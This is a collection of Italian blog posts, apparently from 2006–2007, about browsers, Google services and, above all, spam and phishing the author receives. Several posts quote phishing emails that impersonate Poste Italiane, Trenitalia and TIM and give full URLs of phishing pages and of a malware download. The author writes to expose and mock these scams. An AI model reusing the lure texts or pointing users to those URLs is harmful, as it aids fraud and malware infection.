Stamattina ho buttato l'occhio sulle statistiche online di lloogg, e ho notato che il browser usato dall'ultima persona che si era trovata a guardare le notiziole era marchiato come Gecko/20040614 Firefox/0.9. In pratica, la versione 0.9 di Firefox (si chiamava già così), vecchia di esattamente tre anni. Chissà se ci si riesce a leggere decentemente il mio sito: è vero che non uso tanti orpelli, ma un po' di CSS dentro ci sta...

Marco d'Itri mi ha mandato questo link che conterrebbe un programma per risolvere i sudoku. Beh, che c'è di strano, direte? Il fatto è che il programma è scritto in PostScript, il simpatico linguaggio per stampare pagine. Viene anche citato un programma che lo risolve in SQL, per la cronaca.
Purtroppo a me la cosa non funziona, e GSView si strozza verso l'inizio; ma magari qualcuno dei miei lettori con un Mac riesce a vederlo funzionare in tutto il suo splendore!
Aggiornamento: Chris ha messo una versione pdf che funziona perfettamente anche sui PC.

Se non lo sapeste, FeedBurner è il posto da cui recuperate le mie notiziole, se (a) non volete andare sul mio sito e (b) le volete leggere in formato completo (quello ridotto me lo gestisco in locale). Questo significa che di accessi ne fa parecchi - non tanto per il mio sito, ovviamente, ma per tutti gli altri.
A quanto si legge sul blog di FeedBurner, ieri l'acquisizione della società da parte di Google è stata formalizzata. Che cosa significherà tutto questo in pratica? Boh. L'unica cosa interessante che ho visto è che se uno si preoccupa che i dati personali raccolti da FB siano uniti a tutti gli altri che ha Google, ha un periodo di quindici giorni in cui fare opt-out, e gli amici di Chicago cancelleranno tutti i dati relativi a lui. È già qualcosa.

È il titolo di uno della ventina di phishing odierni a nome "poste.it". Il testo è favoloso, nella sua lingua di Croda:

Il reparto in linea della banca sta chiedendogli di partecipare ad una prova corta che consiste di 5 domande. Nello scambio riceverete 50 E in vostro conto - per il vostro tempo (10 E per la domanda). Con le informazioni riunite potremo fare una serie dei cambiamenti e l'ingrandimento dei nostri servizi. Le informazioni fornite saranno sicuri e confidenziali. Rimarrano nella nostra base di dati per 7 giorni nel frattempo che porteremo attualizzare i risultati della prova.
Stiamo chiedendovi di accordare 2 minuti del vostro tempo per partecipare a questa prova.
Per continuare pressa qui :

(e un bel link a http://mail.convoymktg.com/ /bancopostaonline.fcc.php, compresi i due spazi)
Anche il sito da raggiungere ha delle chicche: ad esempio puoi dire di essere soddisfatto, ma anche Insoddisffato a tal punto da non saperlo più nemmeno scrivere.
Inoltre, il codice di sicurezza è chiesto per questo motivo: "Chiediamo questo codice di essere sicuri che siete il titolare del conto". Ah, la cultura.

PS: Bancaintesa sta pian piano salendo nella lista dei siti sfruttati dai phishers. Peccato che non si siano accorti che gli indirizzi veri dei dipendenti della banca ormai sono tutti @intesasanpaolo.it ...

Oggi sulla casella email dell'ufficio mi sono arrivati due spam di promozione aziende quotate in borsa. Solita cosa, immagine leggermente ruotata e tagliata con sfondo strano e lettere scritte da un ubriaco per fregare gli OCR. Nulla di così strano, insomma, se non fosse che l'azienda in questione era tedesca (quotata alla borsa di Francoforte).
Mi aspetto a questo punto lo spam aziendale turco...

Aggiornamento: (non posso sempre fare un post sui nuovi phishing delle poste, quindi ve lo cuccate qua.

- Finto avviso di ricarica postepay, in un gergo italo-ungherese:
Se pensate che sia qualcosa male con la ricarica prego seguire il collegamento qui sotto ed anullare la transzatione
- accredito all'ufficio postale di Brandizzo (che giusto noi torinesi sappiamo dov'è), inviato da mmo.org.tr (ve l'avevo detto, che volevo i turchi!) e che punta a www.r-f-c.org/images/src.html: r-f-c.org è un sito russo che è stato bucato in maniera mica male, considerando che viene ridiretto a www.computercreationscorp.com/administrator/js/formslogin.php.

Anche questi spammer potrebbero stare un po' attenti, però! Non è che possano dirmi che i miei dati su poste.it non sono congruenti, e che occorra aggiornare la anaagrafica, e mandare il tutto dall'indirizzo "WesternUnion" <rewards@westernunion.com>, che poi rischio di non salvarlo assieme a tutti gli altri!
Per la cronaca, il link su cui ti invitano a cliccare è http://64.89.27.74/bancoposta.online.it/bpol/cartepr/index.htm , anche se con firefox la cosa è sempre complicata perché lui si accorge che il sito può essere una web forgery, o se preferite dirlo in italiano una sòla. Il sito è nella sottorete di servergod.com, che è un bel nome, no?

Non riesco proprio a capire. Del phishing di "Prisco Mazzi" della Polizia (tra l'altro simpatico, con il virus in un allegato zippato cifrato... del quale ti viene data la password per decrittarlo. L'ho sempre detto, io, che il modo migliore per fregare qualcuno è farlo in grande) ne hanno parlato tutti: Repubblica, Corriere, La Stampa che in genere non è che aggiorni così spesso il suo sito. Mi è arrivato un messaggio interno dalla Security Telecom (gli eredi di Tavaroli, insomma). Bene, io personalmente non ho ricevuto nemmeno uno di questi messaggi! Nemmeno le mie caselle email usate apposta per ricevere spam non hanno visto nulla, e vi assicuro che non è una bella sensazione. È come trovarsi lasciato fuori dal Mondo Che Conta.

Per potere dire qualcosa, mi trovo a dover citare questo articolo che spiega alcune tecniche di "spam per immagine". Vi sarete sicuramente accorti di come stia crescendo il numero di spam che non ha all'interno del testo, ma un gif contenente il messaggio: ma magari non sapete - io almeno non lo sapevo - che alcuni dei sistemi antispam sono anche capaci a leggere il testo contenuto in un'immagine, e quindi bloccare i testi "non buoni". Come sempre, però, i cattivi se ne inventano sempre una nuova. Abbiamo così i GIF "a più strati", oppure i testi scritti con i caratteri in colori diversi che noi riusciamo a comprendere ma gli OCR no, o ancora i pixel "sporchi", un po' come l'effetto neve quando si vede un canale TV analogico un po' debole. Ma il massimo è forse il GIF animato che fa pian piano comparire il testo che vogliamo che entri in testa alla cavia... pardon, al destinatario dello spam. Ne sanno davvero una più del diavolo.

Aggiornamento: (17 maggio) A dire il vero, mau(tin.it ne aveva ricevuto cinque copie, ma l'antispam le aveva immediatamente messe in quarantena. Peccato che quella casella email abbia un nome troppo corto e quindi facilmente spammabile, altrimenti la userei di più!

Quelli di lloogg hanno anche fatto un'altra applicazione sempre in stile web 2.0: OKNOtizie.
Questa applicazione, ospitata da Alice (che bello, per una volta posso fare una pubblicità sinergica...) vorrebbe diventare l'equivalente italiano di digg: un posto dove gli utenti iscritti possono segnalare le notizie web che ritengono interessanti, e tutti possono votare OK se la notizia è loro piaciuta, oppure NO se ritengono sia spam.
Come in tutti questi sistemi di editoria sociale, in un certo senso si perde il controllo completo del proprio post, visto che a partire dalla pagina vista sotto OKNOtizie si possono scrivere dei commenti (che possono essere anch'essi votati con lo stesso meccanismo): a ognuno la scelta di cosa fare, tenendo comunque conto che come scritto sopra chiunque può segnalare una notizia altrui.
Inutile dire che viene fornita una bookmarklet che permette con un semplice clic di segnalare una notizia; forse meno inutile fare presente che io non sia riuscito a trovare un sistema per avere automaticamente indicato sui miei post il numero di OK che hanno ricevuto. Per il momento sto cercando almeno di mettere su la possibilità di segnalarmi e votarmi, ma abbiate pietà di un povero matematico!

Dopo >Luciano e Iaia ho provato anch'io a usare lloogg (che, anche se non sembra, è un servizio italianissimo). A parte tutta l'interfaccia web 2.0 che è tanto di moda, il punto fondamentale del sistema è che ti mostra in tempo reale gli ultimi accessi al sito: quello che uno unixaro fa con il comando tail -f. Non so se e quanto serve, anche perché avendolo solo provato con la home page del mio blog non è che i dati siano così variabili: però potrebbe essere interessante.
Il sistema non è libero ma funziona a inviti: se vi interessa, ne ho uno.

Stamattina, i messaggi di spam nella mia casella all'uopo dedicata erano 130. Di questi, esattamente trentanove affermavano di essere di poste.it.

Una truffa telematica stile "419" consiste nel comunicarti che hai vinto un premio perché il tuo indirizzo email è stato sorteggiato da non si sa bene chi.
Devo dire però che questa volta si sono superati: il sorteggio è stato fatto "by Coca-Cola in conjunction with the British American Tobacco Worldwide Promotion.". Mancava solo Playboy.

Per la precisione, mi basterebbe un DocBook editor online: qualcosa che mi permetta di salvare il file da qualche parte, ed editarmelo a piacere. Da una rapida ricerca, XMLIA, checché ne dica, fa solo da viewer; DocBook Wiki me lo devo installare da qualche parte e devo anche installarmi prima un casino di roba; Google docs, Zoho, ThinkFree non hanno questa possibilità.
Che cosa mi sai dire, caro lettore?

Dopo la tentata fusione Autostrade-Abertis, l'OPA di Enel su Endesa e l'ingresso di Telefónica in Telecom Italia, vi annuncio in anteprima che persino il phishing sta pensando in maniera sovrannazionale!
Sulla mia vecchia casella mi sono trovato il solito "Caro Cliente Nuovi servizi online di Poste.It sono disponibili." (compreso di punto nel titolo, sì) che però è stato inviato da "LaCaixa"<service@LaCaixa.es>.
Sarà meglio impararsi un po' di castigliano, mi sa.

Slashdot presenta una ricerca francese che mostra come l' uso di Firefox come browser all'interno dell'Europa sia cresciuto di cinque punti percentuali in un anno, portandosi al 25% del totale... il che è una bella cosa (non per altro, ma perché IE supporta male standard nemmeno tanto nuovi come il CSS)
Ma la cosa più interessante dell'articolo, almeno per me, è la cartina della penetrazione del browser per nazione. Scopriamo così che i tedeschi hanno il 36%, e che Firefox è molto amato nel'est e in Finlandia. L'Italia? Con un 15.5% è al terz'ultimo posto in Europa (mi rifiuto di considerare Andorra), seguita solamente da Olanda e Danimarca.
Considerando che IE te lo trovi dentro il PC, mentre Firefox te lo devi installare, credo che questo la dica molto lunga sulle capacità informatiche dell'italiano medio...

Ho trovato su slashdot il puntatore a questo articolo della BBC che afferma che Adobe sta preparando una nuova versione di Flash che, dando il contentino della possibilità di vedere i filmatini offline, aggiungerà una simpatica caratteristica: il DRM, praticamente i lucchetti elettronici di gestione dei diritti, tipo quelli sulle canzoni scaricate per iPod. Ma in questo caso il vero motivo del DRM è ... la pubblicità, che potrà venire inserita all'interno dei filmatini e non potrà essere eliminata dal povero fruitore del contenuto. Come vedete, il futuro ci porterà sempre tante cose bellissime... beh, più che altro vi porterà, visto che io di video ne guardo ben pochi essendo un vecchietto amante del testo scritto che dal mio punto di vista ha un rapporto segnale/rumore molto maggiore.
L'unica speranza è che Gnash funzioni rapidamente... anche se con i DRM di mezzo gli sviluppatori potrebbero essere incriminati per avere fatto il reverse engineering dell'applicativo.

Stamattina mi è arrivato un link da cliccare (per i curiosi, questo). Ho provato a digitarlo... e mi è uscita fuori la home page dell'intranet aziendale.
La cosa non è così strana, di per sé: basta che il proxy abbia una lista di siti "cattivi" che vengano ridiretti altrove, e il trucchetto funziona perfettamente. Però non mi aspettavo che nella mia azienda venisse utilizzato qualcosa del genere, e soprattutto mi pare un tocco da maestro il fare la ridirezione "a casa" invece che mettere una schermata minacciante chissà quali pene infernali per il miscreante.

Ero stato troppo ottimista a dire che avevo eradicato Norton Internet Security dal pc di Anna. In effetti, ha continuato a lamentarsi perché tutte le volte che apriva un'applicazione di Office le arrivavano tre messaggi di errore perché non poteva partire la funzione di recovery. Il problema non era tanto di Office, tanto che una sua reinstallazione non è servita a nulla, quanto appunto di un rimasuglio del Norton Antivirus che era rimasto tra i piedi.
I consigli della Symantec (e della Microsoft) sono fondamentalmente "disinstalla e reinstalla", cosa che evidentemente non era possibile. Ho provato di tutto, compreso provare ad installare una nuova versione demo del NAV (il setup mi ha spernacchiato dietro, dicendomi "non posso farlo perché hai ancora una versione vecchia: disinstallala!"), pistolare di registry, usare Hijackthis! per togliere un qualunque riferimento a Symantec. Alla fine, con una tecnica tratta da Amelia: le mie ricette (edizione Papersera), ho contemporaneamente rinominato certe voci del registro, creato alcune directory fittizie, e deregistrato avupdate.dll. Questo approccio integrato sembra avere ottenuto un certo successo, anche se vi lascio immaginare com'è rimasta la configurazione di quel povero pc.

È un po' che non racconto più dei troiani che mi arrivano in mezzo allo spam...ehm, alla posta elettronica. Ma è anche vero che non è che ci siano tante novità: la cosa più eclatante è probabilmente notare come mi arrivino cinque-sei messaggi spediti da "Posteitaliane" nelle sue varie incarnazioni di BancoPosta, PostePay e simili. La cosa più triste, però, è che sul sito delle poste non hanno nemmeno messo un bell'avvisone in grande sui rischi di phishing.
Ma qualcosa di buffo mi capita ancora. Non so come mai, ma mi arriva ogni tanto sull'account gmail qualche tentativo di phishing della serie "hai ricevuto una cartolina!" scritti in portoghese (brasiliano, per la precisione). Stanotte me n'è arrivato uno da una certa "Andrea":

Olá, Você acaba de receber um TIM videomensagem do número 98247758
Para ver a Mensagem Clique abaixo em ver.

TIM VideoMensagem ( VER )

Se andavi a "ver", finivi su http://www.voxlove.kit.net/ che a sua volta ridirigeva su http://www.info-vip.com che rimbalzava al volo sul file http://www.bizaide.net/uploads/cartao32456.scr - così ad occhio, un sito giapponese che è stato bucato.
Ma il giro di link in stile "alla fiera dell'Est" non è in fin dei conti nulla di strano: quello che mi ha colpito davvero è che il videomessaggio fosse indicato arrivare da Tim Brazil. Ma allora la nostra consociata sudamericana è davvero importante!

Non so se vi siano arrivati degli inviti a iscriversi a Tagged. A me sì, e non avendo molto da fare l'ho anche attivato (tanto se lo sapevano già il mio indirizzo email non ci perdevo molto).
Però naturalmente non sono stato così volpino da scrivere la mia password gmail per "invitare tutti i miei contatti". Ragazzi, d'accordo che il sistema migliore per rubare le password altrui è farsele dare direttamente, ma vi pare il caso?

Alcuni anni fa comprai il dizionario De Mauro con allegato CD, perché non ho mai voglia di alzarmi a cercare una parola sul dizionario. A dire il vero non la cerco nemmeno sul CD, così lo usa Anna.
Una decina di giorni ma, mi fa "guarda che non funziona più il software". Mi fa vedere che se seleziona "Analisi morfologica", scrive una parola, e clicca su "analizza", viene mangiata l'ultima lettera della parola: quindi ovviamente non trova nulla. Nella lista lemmi, invece, non ci sono problemi. Vabbè, dico io, intanto aggiungi una lettera a caso in fondo alla parola che così funziona: poi reinstallerò il programma.
Oggi mi sono ricordato della cosa: ho disinstallato e reinstallato il cd, ma il risultato continua ad essere identico. Qualcuno ha idea di cosa possa essere successo?

Non so bene che cosa stia succedendo al mio Firefox, ma credo che ci sia qualche problemuccio: mentre cercavo infatti di editare un documento via Google Docs, mi è arrivata una pagina di errore dove mi viene detto Sorry, but this browser does not support web word-processing e spiegato quali browser GRATUITI andrebbero bene (c'è anche IE 6.0 o superiore, giusto per evitare commenti a riguardo). Ma la cosa più bella è la noticina in fondo:

If you are working to fix problems with a specific browser and would like to bypass this check, just add &browserok=true to the end of the Google Docs & Spreadsheets url.

And, it won't work very well -- really.

(ps: quello che succedeva al mio Firefox è che stavo giocando con l'estensione "cambia UserAgent" e gli dicevo di fare finta di essere Opera)

A quanto pare - io almeno me ne sono accorto oggi, ma non vuol dire molto - la ricerca google all'interno dei newsgroup e assimilati non è più una versione beta. Lo so, non vedere più la magica parolina che piace tanto a quelli di Google è sempre un colpo... peggio ancora, però, è scoprire che hanno di nuovo cambiato - ed è la quarta volta - l'interfaccia, e ogni volta mi sa tanto che si perdano dei (vecchi) post. Vabbè, il diritto all'oblio ce lo prenderemo così!

stanotte mi è arrivato un messaggio da "webmaster@trenitalia.com" con il seguente testo:

Disabilitazione Trenitalia
Gentile MAURIZIO CODOGNO,
Le segnaliamo che da molto tempo non usufruisce dei nostri servizi on-line;
pertanto l'utenza 'xxxxxxxxx' a lei assegnata scadrà fra 5 giorni.
Le ricordiamo infatti che, in conformità alla legge 196/2003, le utenze non utilizzate per 6 mesi verranno automaticamente disabilitate.
Se non vuole che la sua utenza venga disabilitata ed è ancora interessato ai nostri servizi Clicchi qui e acceda all'Area Clienti del nostro sito inserendo nella maschera di autenticazione la sua user-id e la sua password.


If you don't want your user-id to be disabled and if you are still interested in our services Click here and type your user-id and password in the log-in interface to log in our web site Customer Area.

Nonostante lo stile, il messaggio era genuino (anche se per sicurezza non ho cliccato e mi sono connesso aprendo un nuovo tab e digitando a manina www.trenitalia.com). Certo che la vita di un poveretto diventa difficile, se si mettono a fare di questi scherzi... E dire che basterebbe ad esempio aggiungere in fase di registrazione la richiesta di una coppia domanda-risposta da utilizzare nel caso non ci si ricordi più la password, e inserire il testo della domanda (che si suppone abbastanza personalizzata perché non possa essere improvvisata da un phisher) nel messaggio di avviso.

È un paio di settimane che quando accendo il mio portatile e mi connetto a Gmail, invece che vedere sul tab Firefox scritto "Gmail - Inbox (4)" o cose del genere mi trovo il testo bloccato come "Gmail - spam". Se mi sconnetto e mi riconnetto, torna a funzionare, ma se esco da Firefox e ci rientro ottengo di nuovo il titolo "spam". Ho provato a cancellare tutti i cookie, ma a quanto sembra il risultato non cambia: ribadisco che capita solo sul mio portatile, e non su quello di Anna o sui PC in ufficio. Suggerimenti?
Aggiornamento: (16 gennaio) È tornato a funzionare tutto perfettamente. Forse un'estensione era un po' farlocca, ed è stata corretta?

Sono già mesi, se non addirittura un anno, che molti messaggi di spam arrivano avendo al loro interno una serie di parole apparentemente sensate. La logica dietro tutto questo è cercare di fregare gli algoritmi bayesiani antispam, che funzionano cercando non tanto le parole chiave che indicano spam quanto la struttura dei messaggi.
Oggi ho iniziato a vedere che la cosa è arrivata a un livello ancora superiore. Il messaggio di spam arriva come una risposta a un supposto nostro messaggio: le prime righe sono infatti
----- Original Message -----
From: il.nostro@indirizzo.email
To: indirizzo.del@supposto.mittente
Sent: Friday, November 17, 2006 3:13 PM
Subject: titolo
Lo spam vero e proprio è sotto forma di una gif, dove viene esplicitamente spiegato di non cliccare sull'indirizzo - che tanto è solo disegnato, non ha un link - ma di scrivere sulla barra degli indirizzi l'URL indicata. Il tutto con frecciolina che indica il posto giusto per chi usa Internet Explorer. Non so se il tutto sia a prova di idiota, però; sicuramente non è a prova di gmail, che ha messo da solo i messaggi nella cartella spam.

Metro racconta di un virus informatico al Policlinico che, a detta del settore informatico dell'ospedale, sarebbe colpa dell'"obsolescenza di alcune postazioni di lavoro". D'accordo che siamo in un ospedale, ma non è che qualcuno può andare a spiegare a quei teNNici che non è che un PC vecchio abbia l'organismo debilitato e quindi sia più soggetto ai mali di stagione?

Qualcuno mi deve spiegare perché qualcuno che invia una email da grupoarroba@email.com.br dovrebbe avvisare un utente gmail (io) che la sua casella di posta elettronica sta per scadere, e permettermi generosamente di farlo ripartire a un'URL che non c'entra un tubo (unicard.trap17.net/recadastramento.php). Il tutto in portoghese.
Non so, il tutto mi ricorda quasi i virus elboniani...

In un impeto di follia, ho pensato bene di lanciare il Microsoft Genuine Advantage Validation Tool. A parte che questo povero PC ne ha passate di tutti i colori, e mi ci va una vita per scaricare il controllo (con svchost.exe che schizza sopra i 100 MB...) dopo il lancio e un congruo tempo mi sono apparse queste frasi:

Grazie per aver scelto di eseguire l'Assistente per la verifica di Windows. Il codice "Product Key" sembra valido.
Ciò significa che la copia del sistema operativo in uso è quasi sicuramente originale. Tuttavia l'Assistente per la verifica di Windows non è in grado di determinare con assoluta certezza l'autenticità del prodotto.

Segue tutta una serie di schermate dove mi viene chiesto di che tipo l'ologramma, e a seconda della risposta devo poi dire sì o no a una serie di domande. Domande però di quelle a cui è ovvio che tu debba rispondere di sì, e quindi sono assolutamente inutili. È vero che anche quando ai bei tempi volavi negli States e compilavi il Visa Waiver ti trovavi domande simili, tipo "stai entrando qua per fare atti terroristici?". Però la cosa mi suona sempre strana.

P.S.: il controllo è passato, però continuo a non riuscire a fare nessun upgrade. Misteri.

Il motto informale di Google è "don't be evil". Sarà. Ma vengo a scoprire che iRows, un programma per fare fogli elettronici via web, è stato comprato da Google e verrà chiuso definitivamente a fine anno, visto che Google il suo foglio elettronico online ce l'ha già. Peccato che a quanto pare iRows aveva delle caratteristiche aggiuntive (come fare i grafici) e che, detto tra noi, Google Spreadsheets non è esattamente il massimo della vita quanto a funzionamento. Sbaglio, o un po' di male c'è stato?

(via ricir, che dà anche un elenco di altri prodotti che si possono usare)

Le "truffe nigeriane" (note anche come "419 scams", dall'articolo del codice penale nigeriano che le vieterebbe) sono ben note a tutti, visto che ci arrivano sempre pacchi di richieste di aiuto nell'esportare denaro più o meno pulito.
Anche le vincite a un qualche tipo di lotteria dove gli indirizzi email dei fortunati sono stati inseriti autonomamente da non si sa bene chi sono fin troppo usuali.
Però volete mettere la gioia di scoprire di avere ricevuto una donazione di £2,555,000.00 (Two Million Five Hundred And Fifty Five Thousand Great Britain Pounds) nientepopodimeno che dalla Fondazione in Memoria della Principessa del Galles? Purtroppo non sono stato il primo, visto che già nel 2005 il messaggio girava. E io che speravo di essere uno dei pochi fortunati :-)

Prima mi sono accorto ieri notte di avere un duecento messaggi di spam nascosti bene in fondo nella relativa cartella, roba insomma di quasi una settimana fa; adesso noto che il flusso di posta indesiderata non è costante, ma i messaggi arrivano in ordine di data sparso. Chissà che cosa sta capitando.

Come potete vedere, Bill Gates sta iniziando a predisporre il suo impero. Hai voluto Word? Ora te lo tieni!

Ultimamente mi stanno arrivando spam del tipo (traduco dall'inglese) "ciao, sono una venticinquenne, sto scrivendo da un internet cafe. Tra un paio di settimane sono nella tua città, perché non ci vediamo? non scrivere a questo indirizzo che non è il mio, ma a qualcosa@directmailchat.info".
Il sito corrispondente a quell'indirizzo è uno dei soliti che ti vendono pilloline azzurre e psicofarmaci, e non vale nemmeno la pena di parlarne troppo: la parte più interessante è che le mail in questione sono assai sgrammaticate e piene di errori di battitura. Il "vantaggio" (da parte dello spammatore) è che in questo modo le verifiche antispam falliscono miserevolmente, e quindi il messaggio viene probabilmente visualizzato e non finisce nel cestino.

Non ce l'ho fatta. Dopo dodici ore dall'uscita ufficiale, sono andato sul sito e mi sono scaricato Firefox 2.0.
Bisogna dire che sono riuscito a mantenere tutte le mie estensioni funzionanti, e quindi mi sento molto felice. L'interfaccia è leggermente diversa, e mi devo abituare all'idea che il tab non si chiuda in alto a destra, ma sul tab stesso.
Poi la prima cosa che ho fatto è stata disabilitare lo spell checker automatico, che non sopporto per nulla. Voglio sbagliare per conto mio! Il trucco è andare su about:config e porre a 0 il valore di layout.spellcheckDefault.

Con un ritardo di una decina di giorni - non per nulla il trafiletto è siglato come il giornale, e non da un'agenzia - City ci fa sapere che "SurfControl ha individuato un sito web fasullo che sembra il sito italiano di Google". Nulla di nuovo sotto il sole: però scoprire che il sito "utilizza una tecnica che fa assomigliare i due siti web e i loro indirizzi, differenziandoli con una lettera" apre inquietanti prospettive sulle incredibili possibilità fornite dall'alfabeto latino.

Dopo anni e anni e anni, alla Micro$oft si sono accorti che il loro simpatico browser stava perdendo colpi (in quota di mercato: rispetto ai bug, nessuno ci fa più caso). Così hanno rimesso un gruppone di sviluppatori, e finalmente è uscito IE7.
Peccato che nella nostra rete non possiamo usarlo: non tanto per politiche di rete, quanto perché IE7 richiede necessariamente un XP originale - e questo ce l'abbiamo, che pensavate? - Service Pack 2. Qui il SP2 sembra essere considerato tabù... e la gestione dei nostri PC è chiaramente remotizzata. Non che sia un problema, per me: vado tranquillamente avanti con Firefox (1.5, prima di passare alla 2 credo che aspetterò un mesetto dall'uscita della versione definitiva)

Stavo guardando le statistiche del mio sito: ecco la prima riga per il mese di ottobre.
# Contatti | File | KBytes | Visite | Host
1 6809927 92.60% | 510 0.22% | 2346501 63.81% | 154 0.36% | 87.5.150.184
Insomma, un singolo host ha fatto il 92% degli accessi al mio sito - per dare un'idea, il secondo sito ha 3956 accessi nello stesso periodo. Il tutto è avvenuto tra il 6 e il 7 ottobre, il che tra l'altro mostra quanto io sia attento alle statistiche :-)
Sono andato a guardare un po' più attentamente cosa diavolo potesse essere successo: magari c'è qualche baco sfruttato per inviare spam in giro. Un controllo al log degli errori http mi fa però scoprire la verità: eccone un (piccolo) estratto.

[...]
[Thu Oct 05 22:59:43 2006] [error] [client 87.5.150.184] File does not exist: /home/httpd/html/xmau/0/000000000c.html
[Thu Oct 05 22:59:43 2006] [error] [client 87.5.150.184] File does not exist: /home/httpd/html/xmau/0/000000000c.html
[Thu Oct 05 22:59:43 2006] [error] [client 87.5.150.184] File does not exist: /home/httpd/html/xmau/0/000000000c.html
[...]
[Thu Oct 05 22:59:46 2006] [error] [client 87.5.150.184] File does not exist: /home/httpd/html/xmau/0/000000000d.html
[Thu Oct 05 22:59:46 2006] [error] [client 87.5.150.184] File does not exist: /home/httpd/html/xmau/0/000000000d.html
[Thu Oct 05 22:59:46 2006] [error] [client 87.5.150.184] File does not exist: /home/httpd/html/xmau/0/000000000d.html
[Thu Oct 05 22:59:47 2006] [error] [client 87.5.150.184] File does not exist: /home/httpd/html/xmau/0/000000000d.html
[...]

Non è un errore di copincolla. Ci sono stati vari milioni di richieste contemporanee - e quindi significa che è stato fatto uno script apposito - con richieste multiple alla stessa pagina - e quindi significa che chi ha fatto lo script non è nemmeno in grado di programmare decentemente. Il tutto per riuscire a scoprire quali fossero le pagine del mio giochino. Mi sono chiesto che cosa potesse essere successo a host184-150-dynamic.5-87-r.retail.telecomitalia.it per impazzire così, e mi è venuto in mente uno scambio di email iniziato con questo messaggio (il dominio email del mittente è stato oscurato per ovvie ragioni di privacy)

nome: T©® ELITE RAVENLORD ®©T
email: elite_pro@xxxxxx.xx
messaggio: Salve. E' possibile sapee quante pagine ci sono in questo gioco ( http://0.xmau.com/ ) ? Come sono disposte all'interno della root del tuo dominio? Sono nella stessa cartella oppure vengono reindirizzate da altre posizioni?

Guarda caso, quell'email è stata spedita da un altro sito dinamico sotto retail.telecomitalia.it. Io gli avevo risposto picche, e probabilmente l'amico ha voluto dimostrare di essere più furbo di me. A parte che non è riuscito a trovarle tutte, potrebbe essere interessante scoprire se il mio provider vuole piantare qualche casino al riguardo... :-)

Uso spesso Google Calendar, soprattutto per ricordarmi i compleanni dei miei conoscenti. Come mi capita spesso, guardo i reminder distrattamente, perché tanto so di che si tratta: stamattina mi sono però accorto che non mi era arrivato un reminder ma un promemoria. Insomma, mi era stata modificata la lingua, e adesso - anzi da ieri mattina, come ho verificato scorrendo la posta nel cestino - il signor Google mi scriveva nella dolce lingua del sì.
Vorrei solo sapere chi gliel'ha detto, visto che io mantengo sempre l'interfaccia in inglese per snobismo informatico; e soprattutto chi gli ha detto che la mia nazione è la Francia :-(

Stamattina avevo stranamente solo quattro messaggi in inbox: due spam, una mailing list e un messaggio da assistenza@posteitaliane.it, dal titolo Comunicazione nr. 91210 del 22 Settembre 2006 - Leggere con attenzione . Ora è vero che non ha un gran senso che posteitaliane.it mi spedisca email a un indirizzo che non sia quello @poste.it, quindi anche senza avere ancora bevuto il primo caffè sono stato in grado di capire che è un phishing. Però garantisco che è stato il migliore in assoluto che abbia visto. Ho salvato un'immagine del messaggio per chi volesse verificare la mia affermazione: l'uso dell'italiano burocratico è perfetto. Io avrei probabilmente specificato meglio l'articolo di legge, ma non si può pretendere troppo.
Per curiosità ho provato a digitare l'indirizzo email indicato nel messaggio; anzi, per prima cosa ho cambiato l'ultima cifra dell'URL, e mi è arrivata una pagina di errore. Con il link giusto sono arrivato in una pagina relativamente simile a quella di Posteitaliane (anche qua, però, non puoi lasciare come titolo della pagina "vuoto", mio caro phisher!); ho coscienziosamente inserito nome utente a password (per i curiosi, "silvio.berlusconi" e "Veronica"), ho selezionato nella pagina successiva la carta PostePay numero 31415926, e finalmente mi è arrivata l'attesa schermata "Messaggio di errore. Impossibile verificare le informazioni fornite e procedere con l'operazione. Riprovare fra 24/48 ore." Diciamo che non è impossibile che qualcuno ci caschi: tra l'altro ci sono persino i gif animati delle pubblicità di Posteitaliane!

Faccio infine notare che il sito www.ssl-posteitaliane.net è stato regolarmente acquistato: beh, i dati di registrazione sembrano un po' farlocchi, anche se in effetti per quanto ne so con i nuovi CAP può esserci di tutto.

Domain Name.......... ssl-posteitaliane.net
Creation Date........ 2006-09-21
Registration Date.... 2006-09-21
Expiry Date.......... 2007-09-21
Organisation Name.... Roberto Morre
Organisation Address. Via dei Cigni 29
Organisation Address. Roma
Organisation Address. 91827
Organisation Address. 00
Organisation Address. ITALY

Admin Name........... Roberto Morre
Admin Address........ Via dei Cigni 29
Admin Address........ Roma
Admin Address........ 91827
Admin Address........ 00
Admin Address........ ITALY
Admin Email.......... robertomoore@inbox.com
Admin Phone.......... 534676321

Ah: la mail è partita dall'indirizzo IP 87.1.13.8, che corrisponde a un blocco IP assegnato a Tin.it per la zona di ... Napoli :-)

Stamattina quando ho aperto la posta non ci volevo credere. Dal form che c'è nel mio sito per inviarmi messaggi mi è arrivato dello spam. È quello del tipo "caratteri casuali", senza link né altro, ed arriva dall'IP 202.101.6.85 che corrisponde a un PC cinese probabilmente infettato, ma riuscire a compilare un form di quel tipo è qualcosa che non ritenevo ancora possibile per le capacità di un sistema automatico. È vero che il form di per sé ha un nome facile (mailform.html) e la struttura standard, e infatti penso che stasera ci farò qualche modifica ad hoc, però "nome" invece che "name" l'ha beccato, anche se "titolo" è rimasto vuoto :-)

Girellando tra i referrer al mio sito, mi sono imbattuto in questo sito, che ti permette di scoprire quali sono i siti che linkano al tuo, ordinati per nome o per pagerank, e ricavati da Google, Yahoo! oppure MSN.
Se riuscite a tirare fuori un qualche senso dalle pagine solamente in tedesco, potete scoprire delle chicche niente male: ad esempio, le ricerche su Yahoo! mi danno moltissimi risultati in più, ma senza un grande vantaggio per il curiosone, perché sono inquinati dai siti spammosi.
Il sito permette comunque di fare altre simpatiche statistiche, tipo quella sulle parole (e le coppie e le terne) più usate in una pagina web. Buon sistema per perdere tempo quando uno ne ha proprio bisogno, anche perché non è che la velocità sia così strabiliante.

In uno dei miei soliti attacchi di egocentrismo, ho provato a scrivere "maurizio codogno" nella pagina di ricerca google. La risposta è stata "Risultati 1 - 100 su circa 103.000". Nulla di strano, il numero totale di voci è sempre una variabile assolutamente casuale che non rispecchia certo quanti risultati vengono mostrati; in genere ce ne stanno circa 400-500. Questa volta, invece, un mortorio. Solamente 150 risultati, non uno di più. D'accordo che siamo in agosto e quindi magari uno si aspetta inconsciamente qualcosa in meno del solito; ma qua la cosa assume i criteri del mistero, perché ad esempio l'elenchino non ritorna alcun risultato relativo al mio omonimo che nel campo calcistico ha sicuramente più notorietà del sottoscritto. Che sarà successo?

